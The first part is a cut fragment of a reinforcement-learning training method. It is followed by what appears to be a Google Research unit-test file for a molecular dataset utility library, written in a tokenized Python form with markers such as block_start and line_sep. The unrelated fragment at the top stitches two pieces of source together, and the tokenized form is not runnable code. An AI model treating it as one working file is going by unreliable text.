total_T=self.total_T)<block_end>self.total_T<augadd>D.total_T<line_sep>out={}<if_stmt>self.policy.lr_scheduler<is><not><none><block_start>out['current_lr']=self.policy.lr_scheduler.get_lr()<block_end>out['loss']=loss.item()<line_sep>out['policy_loss']=policy_loss.item()<line_sep>out['entropy_loss']=entropy_loss.item()<line_sep>out['policy_entropy']=-entropy_loss.item()<line_sep>out['value_loss']=value_loss.item()<line_sep>ev=ExplainedVariance()<line_sep>ev=ev(y_true=Qs.detach().cpu().numpy().squeeze() y_pred=all_Vs.detach().cpu().numpy().squeeze())<line_sep>out['explained_variance']=ev<line_sep><return>out<block_end>@property<def_stmt>recurrent self<block_start><pass><block_end><block_end> |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for smu_utils_lib."""<import_stmt>copy<import_stmt>os<import_stmt>tempfile<import_from_stmt>absl.testing absltest<import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>rdkit Chem<import_from_stmt>google.protobuf text_format<import_from_stmt>smu dataset_pb2<import_from_stmt>smu.parser smu_parser_lib<import_from_stmt>smu.parser smu_utils_lib<line_sep>MAIN_DAT_FILE='x07_sample.dat'<line_sep>STAGE1_DAT_FILE='x07_stage1.dat'<line_sep>TESTDATA_PATH=os.path.join(os.path.dirname(os.path.abspath(__file__)) 'testdata')<def_stmt>str_to_bond_topology s<block_start>bt=dataset_pb2.BondTopology()<line_sep>text_format.Parse(s bt)<line_sep><return>bt<block_end><def_stmt>get_stage1_conformer <block_start>parser=smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH STAGE1_DAT_FILE))<line_sep>conformer,_=next(parser.process_stage1())<line_sep><return>conformer<block_end><def_stmt>get_stage2_conformer <block_start>parser=smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH MAIN_DAT_FILE))<line_sep>conformer,_=next(parser.process_stage2())<line_sep><return>conformer<block_end><class_stmt>SpecialIDTest(absltest.TestCase)<block_start><def_stmt>test_from_dat_id self<block_start>self.assertIsNone(smu_utils_lib.special_case_bt_id_from_dat_id(123456 'CC'))<line_sep>self.assertEqual(smu_utils_lib.special_case_bt_id_from_dat_id(999998 'O') 899650)<line_sep>self.assertEqual(smu_utils_lib.special_case_bt_id_from_dat_id(0 'O') 899650)<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.special_case_bt_id_from_dat_id(0 'NotASpecialCaseSmiles')<block_end><block_end><def_stmt>test_from_bt_id self<block_start>self.assertIsNone(smu_utils_lib.special_case_dat_id_from_bt_id(123456))<line_sep>self.assertEqual(smu_utils_lib.special_case_dat_id_from_bt_id(899651) 999997)<block_end><block_end><class_stmt>GetCompositionTest(absltest.TestCase)<block_start><def_stmt>test_simple 
self<block_start>bt=dataset_pb2.BondTopology()<line_sep>bt.atoms.extend([dataset_pb2.BondTopology.ATOM_C dataset_pb2.BondTopology.ATOM_C dataset_pb2.BondTopology.ATOM_N dataset_pb2.BondTopology.ATOM_H dataset_pb2.BondTopology.ATOM_H dataset_pb2.BondTopology.ATOM_H])<line_sep>self.assertEqual('x03_c2nh3' smu_utils_lib.get_composition(bt))<block_end><block_end><class_stmt>GetCanonicalStoichiometryWithHydrogensTest(absltest.TestCase)<block_start><def_stmt>test_cyclobutane self<block_start>bt=smu_utils_lib.create_bond_topology('CCCC' '110011' '2222')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(ch2)4')<block_end><def_stmt>test_ethylene self<block_start>bt=smu_utils_lib.create_bond_topology('CC' '2' '22')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(ch2)2')<block_end><def_stmt>test_acrylic_acid self<block_start>bt=smu_utils_lib.create_bond_topology('CCCOO' '2000100210' '21001')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(c)(ch)(ch2)(o)(oh)')<block_end><def_stmt>test_fluorine self<block_start>bt=smu_utils_lib.create_bond_topology('OFF' '110' '000')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(o)(f)2')<block_end><def_stmt>test_fully_saturated self<block_start>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('C' '' '4')) '(ch4)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('N' '' '3')) '(nh3)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('O' '' '2')) '(oh2)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('F' '' '1')) '(fh)')<block_end><def_stmt>test_nplus_oneg self<block_start>bt=smu_utils_lib.create_bond_topology('NO' '1' 
'30')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(nh3)(o)')<block_end><block_end><class_stmt>ParseBondTopologyTest(absltest.TestCase)<block_start><def_stmt>test_4_heavy self<block_start>num_atoms,atoms_str,matrix,hydrogens=smu_utils_lib.parse_bond_topology_line(' 4 N+O O O- 010110 3000')<line_sep>self.assertEqual(num_atoms 4)<line_sep>self.assertEqual(atoms_str 'N+O O O-')<line_sep>self.assertEqual(matrix '010110')<line_sep>self.assertEqual(hydrogens '3000')<block_end><def_stmt>test_7_heavy self<block_start>num_atoms,atoms_str,matrix,hydrogens=smu_utils_lib.parse_bond_topology_line(' 7 N+O O O O-F F 001011101001000000000 1000000')<line_sep>self.assertEqual(num_atoms 7)<line_sep>self.assertEqual(atoms_str 'N+O O O O-F F ')# Note the trailing space
self.assertEqual(matrix '001011101001000000000')<line_sep>self.assertEqual(hydrogens '1000000')<block_end><block_end><class_stmt>CreateBondTopologyTest(absltest.TestCase)<block_start><def_stmt>test_no_charged self<block_start>got=smu_utils_lib.create_bond_topology('CNFF' '111000' '1200')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_F
atoms: ATOM_F
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 6
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><def_stmt>test_charged self# This is actually C N N+O-
<block_start>got=smu_utils_lib.create_bond_topology('CNNO' '200101' '2020')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 6
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 7
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><def_stmt>test_one_heavy self<block_start>got=smu_utils_lib.create_bond_topology('C' '' '4')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><block_end><class_stmt>FromCSVTest(absltest.TestCase)<block_start><def_stmt>test_basic self<block_start>infile=tempfile.NamedTemporaryFile(mode='w' delete=<false>)<line_sep>infile.write('id,num_atoms,atoms_str,connectivity_matrix,hydrogens,smiles\n')<line_sep>infile.write('68,3,C N+O-,310,010,[NH+]#C[O-]\n')<line_sep>infile.write('134,4,N+O-F F ,111000,1000,[O-][NH+](F)F\n')<line_sep>infile.close()<line_sep>out=smu_utils_lib.generate_bond_topologies_from_csv(infile.name)<line_sep>bt=next(out)<line_sep>self.assertEqual(68 bt.bond_topology_id)<line_sep>self.assertLen(bt.atoms 4)<line_sep>self.assertEqual(bt.smiles '[NH+]#C[O-]')<line_sep>bt=next(out)<line_sep>self.assertEqual(134 bt.bond_topology_id)<line_sep>self.assertLen(bt.atoms 5)<line_sep>self.assertEqual(bt.smiles '[O-][NH+](F)F')<block_end><block_end><class_stmt>ParseDuplicatesFileTest(absltest.TestCase)<block_start><def_stmt>test_basic self<block_start>df=smu_utils_lib.parse_duplicates_file(os.path.join(TESTDATA_PATH 'small.equivalent_isomers.dat'))<line_sep>pd.testing.assert_frame_equal(pd.DataFrame(columns=['name1' 'stoich1' 'btid1' 'shortconfid1' 'confid1' 'name2' 'stoich2' 'btid2' 'shortconfid2' 'confid2'] data=[['x07_c2n2o2fh3.224227.004' 'c2n2o2fh3' 224227 4 224227004 'x07_c2n2o2fh3.224176.005' 'c2n2o2fh3' 224176 5 224176005] ['x07_c2n2o2fh3.260543.005' 'c2n2o2fh3' 260543 5 260543005 'x07_c2n2o2fh3.224050.001' 'c2n2o2fh3' 224050 1 224050001] ]) df check_like=<true>)<block_end><block_end><class_stmt>BondTopologyToMoleculeTest(absltest.TestCase)<block_start><def_stmt>test_o2 self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('O=O' Chem.MolToSmiles(got))<block_end><def_stmt>test_methane self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('[H]C([H])([H])[H]' Chem.MolToSmiles(got))<block_end># This molecule is an N+ central atom, bonded to C (triply), O-, and F
<def_stmt>test_charged_molecule self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_F
bonds {
atom_b: 1
bond_type: BOND_TRIPLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 3
bond_type: BOND_SINGLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('C#[N+]([O-])F' Chem.MolToSmiles(got))<block_end><block_end><class_stmt>ConformerToMoleculeTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<line_sep># We'll make a new initial_geometry which is just the current one with all
# coordinates multiplied by 1000
self.conformer.initial_geometries.append(self.conformer.initial_geometries[0])<line_sep>new_geom=self.conformer.initial_geometries[1]<for_stmt>atom_pos new_geom.atom_positions<block_start>atom_pos.x=atom_pos.x<times>1000<line_sep>atom_pos.y=atom_pos.y<times>1000<line_sep>atom_pos.z=atom_pos.z<times>1000<block_end># For the extra bond_topology, we'll just copy the existing one and change
# the id. Through the dumb luck of the molecule we picked there's not a
# simple way to make this a new bond topology and still have it look valid
# to RDKit
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[1].bond_topology_id=99999<block_end><def_stmt>test_all_outputs self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer))<line_sep>self.assertLen(mols 6)# 2 bond topologies * (1 opt geom + 2 init_geom)
self.assertEqual([m.GetProp('_Name')<for>m mols] ['SMU 618451001 bt=618451(0/2) geom=init(0/2)' 'SMU 618451001 bt=618451(0/2) geom=init(1/2)' 'SMU 618451001 bt=618451(0/2) geom=opt' 'SMU 618451001 bt=99999(1/2) geom=init(0/2)' 'SMU 618451001 bt=99999(1/2) geom=init(1/2)' 'SMU 618451001 bt=99999(1/2) geom=opt'])<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[0] kekuleSmiles=<true> isomericSmiles=<false>))<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[4] kekuleSmiles=<true> isomericSmiles=<false>))<block_end><def_stmt>test_initial_only self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer include_initial_geometries=<true> include_optimized_geometry=<false> include_all_bond_topologies=<false>))<line_sep>self.assertLen(mols 2)<line_sep>self.assertEqual([m.GetProp('_Name')<for>m mols] ['SMU 618451001 bt=618451(0/2) geom=init(0/2)' 'SMU 618451001 bt=618451(0/2) geom=init(1/2)' ])<line_sep># This is just one random atom I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C' mols[0].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([0.6643 -3.470301 3.4766] list(mols[0].GetConformer().GetAtomPosition(1)) atol=1e-6)<line_sep>self.assertEqual('C' mols[1].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([664.299998 -3470.300473 3476.600215] list(mols[1].GetConformer().GetAtomPosition(1)) atol=1e-6)<block_end><def_stmt>test_optimized_only self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer include_initial_geometries=<false> include_optimized_geometry=<true> include_all_bond_topologies=<false>))<line_sep>self.assertLen(mols 1)<line_sep>self.assertEqual(mols[0].GetProp('_Name') 'SMU 618451001 bt=618451(0/2) geom=opt' )<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[0] kekuleSmiles=<true> isomericSmiles=<false>))<line_sep># This is just two random atoms I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C' mols[0].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([0.540254 -3.465543 3.456982] list(mols[0].GetConformer().GetAtomPosition(1)) atol=1e-6)<line_sep>self.assertEqual('H' mols[0].GetAtomWithIdx(13).GetSymbol())<line_sep>np.testing.assert_allclose([2.135153 -1.817366 0.226376] list(mols[0].GetConformer().GetAtomPosition(13)) atol=1e-6)<block_end><block_end><class_stmt>SmilesCompareTest(absltest.TestCase)<block_start><def_stmt>test_string_format self# for some simplicity later on, we use shorter names
<block_start>self.assertEqual('MISSING' str(smu_utils_lib.SmilesCompareResult.MISSING))<line_sep>self.assertEqual('MISMATCH' str(smu_utils_lib.SmilesCompareResult.MISMATCH))<line_sep>self.assertEqual('MATCH' str(smu_utils_lib.SmilesCompareResult.MATCH))<block_end><def_stmt>test_missing self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MISSING result)<line_sep>self.assertEqual('O=O' with_h)<line_sep>self.assertEqual('O=O' without_h)<line_sep># Also directly test compute_smiles_for_bond_topology
self.assertEqual('O=O' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<true>))<block_end><def_stmt>test_mismatch self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
smiles: "BlahBlahBlah"
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MISMATCH result)<line_sep>self.assertEqual('O=O' with_h)<line_sep>self.assertEqual('O=O' without_h)<block_end><def_stmt>test_matched_and_h_stripping self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
smiles: "O"
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MATCH result)<line_sep>self.assertEqual('[H]O[H]' with_h)<line_sep>self.assertEqual('O' without_h)<line_sep># Also directly test compute_smiles_for_bond_topology
self.assertEqual('[H]O[H]' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<true>))<line_sep>self.assertEqual('O' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<false>))<block_end><def_stmt>test_compute_smiles_from_molecule_no_hs self<block_start>mol=Chem.MolFromSmiles('FOC' sanitize=<false>)<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'COF')<line_sep># This is expected. Even with include_hs=True, if there were no Hs in the
# molecule, they will not be in the smiles.
self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true>) 'COF')<block_end><def_stmt>test_compute_smiles_from_molecule_with_hs self<block_start>mol=Chem.MolFromSmiles('FOC' sanitize=<false>)<line_sep>Chem.SanitizeMol(mol Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS)<line_sep>mol=Chem.AddHs(mol)<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'COF')<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true>) '[H]C([H])([H])OF')<block_end><def_stmt>test_compute_smiles_from_molecule_special_case self<block_start>mol=Chem.MolFromSmiles('C12=C3C4=C1C4=C23' sanitize=<false>)<line_sep># Double check that this really is the special case -- we get back the
# SMILES we put in even though it's not the one we want.
self.assertEqual('C12=C3C4=C1C4=C23' Chem.MolToSmiles(mol kekuleSmiles=<true>))<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'C12=C3C1=C1C2=C31')<block_end><def_stmt>test_compute_smiles_from_molecule_labeled_with_h self<block_start>mol=Chem.MolFromSmiles('[O-][N+]([H])([H])N([H])OC([H])([H])F' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>self.assertEqual('[O-][N+:1]([H:2])([H:3])[N:4]([H:5])[O:6][C:7]([H:8])([H:9])[F:10]' smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true> labeled_atoms=<true>))<block_end><def_stmt>test_compute_smiles_from_molecule_labeled_no_h self<block_start>mol=Chem.MolFromSmiles('[O-][N+]([H])([H])N([H])OC([H])([H])F' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>self.assertEqual('[O-][NH2+:1][NH:2][O:3][CH2:4][F:5]' smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false> labeled_atoms=<true>))<block_end><block_end><class_stmt>MergeConformersTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep># We are relying on the fact that the first conformer in both x07_sample.dat
# and x07_stage1.dat are the same.
self.stage1_conformer=get_stage1_conformer()<line_sep>self.stage2_conformer=get_stage2_conformer()<line_sep>self.duplicate_conformer=dataset_pb2.Conformer()<line_sep>self.duplicate_conformer.conformer_id=self.stage1_conformer.conformer_id<line_sep># A real duplicate conformer wouldn't have both of these fields filled in,
# but it's fine for the test to make sure everything is copied.
self.duplicate_conformer.duplicated_by=123<line_sep>self.duplicate_conformer.duplicate_of.extend([111 222])<block_end><def_stmt>test_two_stage2 self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer self.stage2_conformer)<block_end><block_end><def_stmt>test_two_stage1 self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage1_conformer self.stage1_conformer)<block_end><block_end><def_stmt>test_two_duplicates self<block_start>duplicate_conformer2=copy.deepcopy(self.duplicate_conformer)<line_sep>duplicate_conformer2.duplicate_of[:]=[333 444]<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.duplicate_conformer duplicate_conformer2)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(123 got_conf.duplicated_by)<line_sep>self.assertCountEqual([111 222 333 444] got_conf.duplicate_of)<block_end><def_stmt>test_stage2_stage1 self# Add a duplicate to stage1 to make sure it is copied
<block_start>self.stage1_conformer.duplicate_of.append(999)<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [999])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_stage1_conflict_energy self<block_start>self.stage2_conformer.properties.initial_geometry_energy.value=-1.23<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertEqual(got_conflict [618451001 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <true> 1 1 1 1 -1.23 0.052254 -406.522079 2.5e-05 <true> <true>])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<line_sep># This stage2 values should be returned
self.assertEqual(got_conf.properties.initial_geometry_energy.value -1.23)<block_end><def_stmt>test_stage2_stage1_conflict_missing_geometry self<block_start>self.stage2_conformer.ClearField('optimized_geometry')<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertEqual(got_conflict [618451001 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <true> 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <false>])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_stage1_no_conflict_minus1 self# If stage2 contains a -1, we keep that (stricter error checking later on)
<block_start>self.stage2_conformer.properties.initial_geometry_energy.value=-1.0<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.properties.initial_geometry_energy.value -1.0)<block_end><def_stmt>test_stage2_stage1_no_conflict_approx_equal self<block_start>self.stage2_conformer.properties.initial_geometry_energy.value<augadd>1e-7<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep># Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_duplicate self<block_start>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.duplicate_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [111 222])<line_sep>self.assertEqual(got_conf.duplicated_by 123)<line_sep># Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage1_duplicate self<block_start>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage1_conformer self.duplicate_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [111 222])<line_sep>self.assertEqual(got_conf.duplicated_by 123)<line_sep># Just check a random field from stage1
self.assertTrue(got_conf.properties.HasField('initial_geometry_energy'))<block_end><def_stmt>test_multiple_initial_geometries self<block_start>bad_conformer=copy.deepcopy(self.stage1_conformer)<line_sep>bad_conformer.initial_geometries.append(bad_conformer.initial_geometries[0])<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(bad_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer bad_conformer)<block_end><block_end><def_stmt>test_multiple_bond_topologies self<block_start>bad_conformer=copy.deepcopy(self.stage1_conformer)<line_sep>bad_conformer.bond_topologies.append(bad_conformer.bond_topologies[0])<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(bad_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer bad_conformer)<block_end><block_end><def_stmt>test_different_bond_topologies self<block_start>self.stage1_conformer.bond_topologies[0].atoms[0]=(dataset_pb2.BondTopology.ATOM_H)<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage1_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<block_end><block_end><block_end><class_stmt>ConformerErrorTest(absltest.TestCase)<block_start><def_stmt>test_stage1_no_error self<block_start>conformer=get_stage1_conformer()<line_sep>self.assertEqual(0 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage1_error self<block_start>conformer=get_stage1_conformer()<line_sep>conformer.properties.errors.error_frequencies=123<line_sep>self.assertEqual(5 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_no_error 
self<block_start>conformer=get_stage2_conformer()<line_sep>self.assertEqual(0 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_5 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=256<line_sep>self.assertEqual(5 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_4 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=50<line_sep>self.assertEqual(4 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_3 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=4<line_sep>self.assertEqual(3 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_level_2 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_t1_excess=3<line_sep>self.assertEqual(2 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_level_1 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_vib_linearity=1<line_sep>self.assertEqual(1 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><block_end><class_stmt>FilterConformerByAvailabilityTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=dataset_pb2.Conformer()<line_sep>properties=self.conformer.properties<line_sep># A STANDARD field
properties.initial_geometry_energy.value=1.23<line_sep># A COMPLETE field
properties.zpe_unscaled.value=1.23<line_sep># An INTERNAL_ONLY field
properties.compute_cluster_info='not set'<block_end><def_stmt>test_standard self<block_start>smu_utils_lib.filter_conformer_by_availability(self.conformer [dataset_pb2.STANDARD])<line_sep>self.assertTrue(self.conformer.properties.HasField('initial_geometry_energy'))<line_sep>self.assertFalse(self.conformer.properties.HasField('zpe_unscaled'))<line_sep>self.assertFalse(self.conformer.properties.HasField('compute_cluster_info'))<block_end><def_stmt>test_complete_and_internal_only self<block_start>smu_utils_lib.filter_conformer_by_availability(self.conformer [dataset_pb2.COMPLETE dataset_pb2.INTERNAL_ONLY])<line_sep>self.assertFalse(self.conformer.properties.HasField('initial_geometry_energy'))<line_sep>self.assertTrue(self.conformer.properties.HasField('zpe_unscaled'))<line_sep>self.assertTrue(self.conformer.properties.HasField('compute_cluster_info'))<block_end><block_end><class_stmt>ConformerToStandardTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<block_end><def_stmt>test_field_filtering self# Check that the field which should be filtered starts out set
<block_start>self.assertTrue(self.conformer.properties.HasField('optimized_geometry_energy'))<line_sep>got=smu_utils_lib.conformer_to_standard(self.conformer)<line_sep># Check for a field that was originally in self.conformer and should be
# filtered and a field which should still be present.
self.assertTrue(got.properties.HasField('optimized_geometry_energy'))<line_sep>self.assertFalse(got.properties.HasField('zpe_unscaled'))<block_end><def_stmt>test_remove_error_conformer self<block_start>self.conformer.properties.errors.status=256<line_sep>self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))<block_end><def_stmt>test_remove_duplicate self<block_start>self.conformer.duplicated_by=123<line_sep>self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))<block_end><block_end><class_stmt>DetermineFateTest(parameterized.TestCase)<block_start><def_stmt>test_duplicate_same_topology self<block_start>conformer=get_stage1_conformer()<line_sep># bond topology is conformer_id // 1000
